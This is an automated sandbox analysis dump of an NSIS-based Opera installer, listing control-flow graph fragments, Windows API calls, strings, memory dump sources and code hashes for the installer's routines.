4636->4637 4638 402c4f 4637->4638 4639 40149e 4640 4023c2 4639->4640 4641 4014ac PostQuitMessage 4639->4641 4641->4640 4642 4016a0 4643 402dcb 21 API calls 4642->4643 4644 4016a7 4643->4644 4645 402dcb 21 API calls 4644->4645 4646 4016b0 4645->4646 4647 402dcb 21 API calls 4646->4647 4648 4016b9 MoveFileW 4647->4648 4649 4016cc 4648->4649 4655 4016c5 4648->4655 4651 
4069ff 2 API calls 4649->4651 4652 40231b 4649->4652 4650 401423 28 API calls 4650->4652 4653 4016db 4651->4653 4653->4652 4654 406462 40 API calls 4653->4654 4654->4655 4655->4650 4656 404122 4657 40413a 4656->4657 4658 40429b 4656->4658 4657->4658 4659 404146 4657->4659 4660 4042ec 4658->4660 4661 4042ac GetDlgItem GetDlgItem 4658->4661 4663 404151 SetWindowPos 4659->4663 4664 404164 4659->4664 4662 404346 4660->4662 4670 401389 2 API calls 4660->4670 4665 404621 22 API calls 4661->4665 4666 40466d SendMessageW 4662->4666 4682 404296 4662->4682 4663->4664 4667 40416d ShowWindow 4664->4667 4668 4041af 4664->4668 4669 4042d6 SetClassLongW 4665->4669 4717 404358 4666->4717 4671 40418d GetWindowLongW 4667->4671 4694 404259 4667->4694 4672 4041b7 DestroyWindow 4668->4672 4673 4041ce 4668->4673 4674 40140b 2 API calls 4669->4674 4675 40431e 4670->4675 4677 4041a6 ShowWindow 4671->4677 4671->4694 4726 4045aa 4672->4726 4678 4041d3 SetWindowLongW 4673->4678 4679 4041e4 4673->4679 4674->4660 4675->4662 4681 404322 SendMessageW 4675->4681 4676 404688 8 API calls 4676->4682 4677->4668 4678->4682 4680 4041f0 GetDlgItem 4679->4680 4679->4694 4685 404201 SendMessageW IsWindowEnabled 4680->4685 4688 40421e 4680->4688 4681->4682 4683 40140b 2 API calls 4683->4717 4684 4045ac DestroyWindow EndDialog 4684->4726 4685->4682 4685->4688 4686 4045db ShowWindow 4686->4682 4687 4066df 21 API calls 4687->4717 4689 40422b 4688->4689 4691 404272 SendMessageW 4688->4691 4692 40423e 4688->4692 4699 404223 4688->4699 4689->4691 4689->4699 4690 404621 22 API calls 4690->4717 4691->4694 4695 404246 4692->4695 4696 40425b 4692->4696 4693 4045fa SendMessageW 4693->4694 4694->4676 4698 40140b 2 API calls 4695->4698 4697 40140b 2 API calls 4696->4697 4697->4699 4698->4699 4699->4693 4699->4694 4700 404621 22 API calls 4701 4043d3 GetDlgItem 4700->4701 4702 4043f0 ShowWindow EnableWindow 4701->4702 4703 4043e8 4701->4703 4727 404643 EnableWindow 4702->4727 4703->4702 4705 40441a EnableWindow 4710 

Control-flow Graph

APIs
• SetErrorMode.KERNEL32 ref: 00403688
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
• GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
• lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
• #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
• OleInitialize.OLE32(00000000), ref: 004037A3
• SHGetFileInfoW.SHELL32(00432708,00000000,?,000002B4,00000000), ref: 004037C2
• GetCommandLineW.KERNEL32(00464260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
• CharNextW.USER32(00000000,004BD000,00000020,004BD000,00000000,?,00000008,0000000A,0000000C), ref: 00403810
• GetTempPathW.KERNEL32(00002000,004D1000,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
• GetWindowsDirectoryW.KERNEL32(004D1000,00001FFB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
• lstrcatW.KERNEL32(004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
• GetTempPathW.KERNEL32(00001FFC,004D1000,004D1000,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
• lstrcatW.KERNEL32(004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
• SetEnvironmentVariableW.KERNEL32(TEMP,004D1000,004D1000,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
• SetEnvironmentVariableW.KERNEL32(TMP,004D1000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
• DeleteFileW.KERNEL32(004CD000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
• lstrlenW.KERNEL32(004D1000,004BD000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
  • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
• wsprintfW.USER32 ref: 00403AE4
• GetFileAttributesW.KERNEL32(00481000,004D1000), ref: 00403B17
• DeleteFileW.KERNEL32(00481000), ref: 00403B23
• SetCurrentDirectoryW.KERNEL32(004D1000,004D1000), ref: 00403B51
  • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
• CopyFileW.KERNEL32(004D9000,00481000,00000001,004D1000,00000000), ref: 00403B67
  • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
  • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
  • Part of subcall function 004069FF: FindFirstFileW.KERNEL32(74DF3420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 00406A0A
  • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
• ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB0
• CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
• ExitProcess.KERNEL32 ref: 00403BD2
• CloseHandle.KERNEL32(00000000,00485000,00485000,?,00481000,00000000), ref: 00403BD9
• GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
• ExitProcess.KERNEL32 ref: 00403C7C
  • Part of subcall function 00405C50: CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
• String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
• API String ID: 2017177436-2502969717
• Opcode ID: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
• Instruction ID: d5dd5e0f9c74a08960ebc8aa75e9a138e3a42fd8f19371cc0c5244fd25c86c9d
• Opcode Fuzzy Hash: 3d671764197dcef63dc7c2a13f67f50788250ee6bdde08026161d1f705c381d7
• Instruction Fuzzy Hash: 56F108316043019AD720AF769D45B2B7AE8EF4174AF10883EF581B22D1DB7CDA45CB6E

Control-flow Graph

APIs
• DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,004BD000), ref: 00405DD7
• lstrcatW.KERNEL32(00452750,\*.*,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E1F
• lstrcatW.KERNEL32(?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E42
• lstrlenW.KERNEL32(?,?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E48
• FindFirstFileW.KERNEL32(00452750,?,?,?,0040A014,?,00452750,?,?,74DF3420,74DF2EE0,004BD000), ref: 00405E58
• FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
• FindClose.KERNEL32(00000000), ref: 00405F07
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: P'E$\*.*
• API String ID: 2035342205-897026672
• Opcode ID: 2a22b74e29257ee4312f2694a2476e0e063d7e13d36b91b3edff1e0c18e84ae8
• Instruction ID: d3f7042800757c758c726763e218659af4e34a2018f279a2393577cf1f32b1c8
• Opcode Fuzzy Hash: 2a22b74e29257ee4312f2694a2476e0e063d7e13d36b91b3edff1e0c18e84ae8
• Instruction Fuzzy Hash: 5741D130800A05E6CB21AB61CD89ABF7678EF45755F14413FF881B11D1DB7C8A82DEAE

Control-flow Graph

406d25-406d29 526->532 527->499 536 406ce5-406ce7 528->536 537 406cbf-406cc3 528->537 529->508 530->499 531->506 532->511 535 406d2b-406d31 532->535 538 406f75-406f87 533->538 539 406f5f-406f73 533->539 534->510 534->512 544 406d33-406d3a 535->544 545 406d5b-406d6d 535->545 542 406cf5-406cfd 536->542 543 406ce9-406cf3 536->543 540 406cc5-406cc8 GlobalFree 537->540 541 406cce-406cdc GlobalAlloc 537->541 546 406f8a-406f94 538->546 539->546 540->541 541->502 549 406ce2 541->549 542->532 543->542 543->543 547 406d45-406d55 GlobalAlloc 544->547 548 406d3c-406d3f GlobalFree 544->548 545->534 546->524 550 406f96 546->550 547->502 547->545 548->547 549->536 552 4075d6-4075e0 550->552 553 406f1c-406f34 550->553 552->499 553->524
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
• Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
• Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
• Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45
APIs
• FindFirstFileW.KERNEL32(74DF3420,0045A798,00456750,004060C2,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 00406A0A
• FindClose.KERNEL32(00000000), ref: 00406A16
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
• Instruction ID: 35f0ff7019ed0dad564a4e6eb4f1dd92456e0906ec704515d4596d21edce6ab9
• Opcode Fuzzy Hash: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
• Instruction Fuzzy Hash: EDD012317551205BC241A73C6D0C89B7E589F1A3317118B37F46BF21E4D7348C628A9D

Control-flow Graph (rendered graph not reproduced)

APIs
  • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
  • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
• lstrcatW.KERNEL32(004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,74DF3420,004D1000,00000000,004BD000,00008001), ref: 00403DF5
• lstrlenW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,74DF3420), ref: 00403E75
• lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000), ref: 00403E88
• GetFileAttributesW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00403E93
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C1000), ref: 00403EDC
  • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
• RegisterClassW.USER32(00464200), ref: 00403F19
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
• ShowWindow.USER32(00000005,00000000), ref: 00403F9C
• GetClassInfoW.USER32(00000000,RichEdit20W,00464200), ref: 00403FC8
• GetClassInfoW.USER32(00000000,RichEdit,00464200), ref: 00403FD5
• RegisterClassW.USER32(00464200), ref: 00403FDE
• DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H'D$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-2310240611
• Opcode ID: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
• Instruction ID: 15514f3cea8a7976e0aa4835bc9f56462f0e59a4e5397df6ef3051f83c2bc2bc
• Opcode Fuzzy Hash: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
• Instruction Fuzzy Hash: 3C61E770640301BED720AF669D95F273AACEB85B49F10457FF941B22E2DB7D58018A2E

Control-flow Graph (rendered graph not reproduced)

APIs
• GetTickCount.KERNEL32 ref: 00403109
• GetModuleFileNameW.KERNEL32(00000000,004D9000,00002000), ref: 00403125
  • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
  • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
• GetFileSize.KERNEL32(00000000,00000000,004DD000,00000000,004C9000,004C9000,004D9000,004D9000,80000000,00000003), ref: 0040316E
• GlobalAlloc.KERNEL32(00000040,00008001), ref: 004032B0
Strings
• Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
• hA, xrefs: 004032B6
• Error launching installer, xrefs: 00403145
• soft, xrefs: 004031E3
• Inst, xrefs: 004031DA
• Null, xrefs: 004031EC
• Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 00403347
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
                                                                                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$hA$soft
                                                                                                                                                                            • API String ID: 2803837635-3376623841
                                                                                                                                                                            • Opcode ID: a78e4ad808f85481dcd79512046ee08fb7c97768d62f5dc4e9826f195081d52b
                                                                                                                                                                            • Instruction ID: ad1f7a9ef70f4aee06910e8501363caf5be3f78a24e024e3506d72c770e38dd5
                                                                                                                                                                            • Opcode Fuzzy Hash: a78e4ad808f85481dcd79512046ee08fb7c97768d62f5dc4e9826f195081d52b
                                                                                                                                                                            • Instruction Fuzzy Hash: 0271A071D00204ABDB209FA4DD85B6E7AACEB05716F10417FE911B72D1DB789F408B6D

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 360 401794-4017b9 call 402dcb call 405fe8 365 4017c3-4017d5 call 4066a2 call 405f71 lstrcatW 360->365 366 4017bb-4017c1 call 4066a2 360->366 371 4017da-4017db call 406950 365->371 366->371 375 4017e0-4017e4 371->375 376 4017e6-4017f0 call 4069ff 375->376 377 401817-40181a 375->377 384 401802-401814 376->384 385 4017f2-401800 CompareFileTime 376->385 379 401822-40183e call 406192 377->379 380 40181c-40181d call 40616d 377->380 387 401840-401843 379->387 388 4018b2-4018db call 405727 call 403396 379->388 380->379 384->377 385->384 389 401894-40189e call 405727 387->389 390 401845-401883 call 4066a2 * 2 call 4066df call 4066a2 call 405d02 387->390 400 4018e3-4018ef SetFileTime 388->400 401 4018dd-4018e1 388->401 402 4018a7-4018ad 389->402 390->375 422 401889-40188a 390->422 405 4018f5-401900 CloseHandle 400->405 401->400 401->405 406 402c58 402->406 409 401906-401909 405->409 410 402c4f-402c52 405->410 407 402c5a-402c5e 406->407 412 40190b-40191c call 4066df lstrcatW 409->412 413 40191e-401921 call 4066df 409->413 410->406 419 401926-4023c7 call 405d02 412->419 413->419 419->407 426 402953-40295a 419->426 422->402 424 40188c-40188d 422->424 424->389 426->410
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,004C5000,?,?,00000031), ref: 004017D5
                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,004C5000,?,?,00000031), ref: 004017FA
                                                                                                                                                                              • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                            • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                                                            • API String ID: 1941528284-3663954162
                                                                                                                                                                            • Opcode ID: abfc48dbde18ea0f61bdba3ff75caee9a5c96404e809a9cb74966422e51516d8
                                                                                                                                                                            • Instruction ID: 9f42f1e7eaebfaebc1b2313fce90f35831c5a59d22c64b0766d7391dfec550b2
                                                                                                                                                                            • Opcode Fuzzy Hash: abfc48dbde18ea0f61bdba3ff75caee9a5c96404e809a9cb74966422e51516d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 0541D771800114BACF117BB5CD85DAE3679EF45368B21863FF422F11E1D73D8AA19A2D

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 427 406a26-406a46 GetSystemDirectoryW 428 406a48 427->428 429 406a4a-406a4c 427->429 428->429 430 406a5d-406a5f 429->430 431 406a4e-406a57 429->431 433 406a60-406a93 wsprintfW LoadLibraryExW 430->433 431->430 432 406a59-406a5b 431->432 432->433
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                                                            • wsprintfW.USER32 ref: 00406A78
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                            • String ID: %s%S.dll$UXTHEME
                                                                                                                                                                            • API String ID: 2200240437-1106614640
                                                                                                                                                                            • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                                                            • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                                                                                                                                            • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                                                            • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
